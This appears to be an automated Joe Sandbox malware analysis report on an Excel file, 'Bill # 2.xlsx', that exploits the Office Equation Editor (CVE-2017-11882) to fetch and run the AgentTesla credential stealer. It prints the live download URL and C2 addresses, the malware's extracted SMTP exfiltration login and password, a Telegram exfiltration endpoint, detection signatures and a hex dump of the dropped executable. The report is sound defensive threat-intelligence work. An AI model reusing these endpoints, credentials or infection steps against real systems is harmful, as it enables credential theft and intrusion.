Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Bill # 2.xlsx

Overview

General Information

Sample Name:Bill # 2.xlsx
Analysis ID:321163
MD5:483b35b49726fc59ba720ca3106a69f6
SHA1:58b66c28ec98e732920179eb4e270e7b00517f08
SHA256:982e68644911b369c8d440f2ca7e0380b5bb7b3400fe2f53d13f34f2fce5505b
Tags:xlsx

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
May check the online IP address of the machine
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2016 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2708 cmdline: 'C:\Users\Public\vbc.exe' MD5: C11D6124EE0522C7AB71D20CF3474DC0)
      • RegAsm.exe (PID: 2452 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2344 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2364 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "DAjOFWZ9dn", "URL: ": "https://AkXBTiOq5oAkuzK9T5L.org", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "NEASmo3yRPX2q", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.RegAsm.exe.400000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.vbc.exe.460000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.212.152, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                Sigma detected: File Dropped By EQNEDT32EXEShow sources
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe
                Sigma detected: Executables Started in Suspicious FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: Execution in Non-Executable FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708
                Sigma detected: Suspicious Program Location Process StartsShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2708

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://198.23.212.152/doc/tochi.exeAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: RegAsm.exe.2364.7.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "DAjOFWZ9dn", "URL: ": "https://AkXBTiOq5oAkuzK9T5L.org", "To: ": "", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "NEASmo3yRPX2q", "From: ": ""}
                Multi AV Scanner detection for submitted fileShow sources
                Source: Bill # 2.xlsxVirustotal: Detection: 31%Perma Link
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exeJoe Sandbox ML: detected

                Exploits:

                barindex
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: global trafficDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 23.21.42.25:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.212.152:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 1560 WEB-MISC /doc/ access 192.168.2.22:49167 -> 198.23.212.152:80
                Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 198.23.212.152:80
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 208.91.198.143:587
                May check the online IP address of the machineShow sources
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 12:47:40 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Fri, 20 Nov 2020 07:43:07 GMTETag: "97200-5b484fece2d5f"Accept-Ranges: bytesContent-Length: 619008Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 71 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 6a 09 00 00 06 00 00 00 00 00 00 ce 89 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 09 f1 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 89 09 00 4f 00 00 00 00 a0 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 69 09 00 00 20 00 00 00 6a 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 09 00 00 04 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 89 09 00 00 00 00 00 48 00 00 00 02 00 05 00 78 e9 08 00 04 a0 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 88 77 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 29 00 00 70 80 04 00 00 0
                Source: Joe Sandbox ViewIP Address: 23.21.42.25 23.21.42.25
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: global trafficHTTP traffic detected: GET /doc/tochi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.152Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.152
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6B13A00.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /doc/tochi.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.152Connection: Keep-Alive
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: http://VaMNef.com
                Source: RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: RegAsm.exe, 00000007.00000002.2359903836.000000000091C000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: RegAsm.exe, 00000007.00000002.2362318559.00000000057B0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegAsm.exe, 00000007.00000002.2360843456.00000000029DD000.00000004.00000001.sdmpString found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
                Source: vbc.exe, 00000004.00000003.2167387608.0000000004C74000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000007.00000002.2362741103.00000000067C0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: RegAsm.exe, 00000007.00000002.2360976971.0000000002A96000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                Source: RegAsm.exe, 00000007.00000002.2360145060.0000000002430000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: RegAsm.exe, 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmpString found in binary or memory: https://AkXBTiOq5oAkuzK9T5L.org
                Source: RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
                Source: RegAsm.exe, 00000007.00000002.2360808155.00000000029BA000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.2360822194.00000000029CA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: RegAsm.exe, 00000007.00000002.2360835164.00000000029D8000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgP
                Source: vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                Source: RegAsm.exe, 00000007.00000002.2362339269.00000000057C0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: vbc.exe, 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, RegAsm.exe, 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: RegAsm.exe, 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable Editing" from protected documents the yellow bar above 27 28 29 30 31 32 33 34 35
                Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 27 28 29 30 31 32 33 34 35 36 37 13 14 15 "
                Office equation editor drops PE fileShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exeJump to dropped file
                Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F00AD NtOpenSection,NtMapViewOfSection,4_2_003F00AD
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,4_2_003F1C09
                Source: C:\Users\Public\vbc.exeCode function: 4_2_0109F5C14_2_0109F5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023F8507_2_0023F850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_002353287_2_00235328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_002363487_2_00236348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023ECA87_2_0023ECA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023D6087_2_0023D608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_002356707_2_00235670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_002320917_2_00232091
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0023C9B77_2_0023C9B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005294A87_2_005294A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005285D07_2_005285D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005216007_2_00521600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005223107_2_00522310
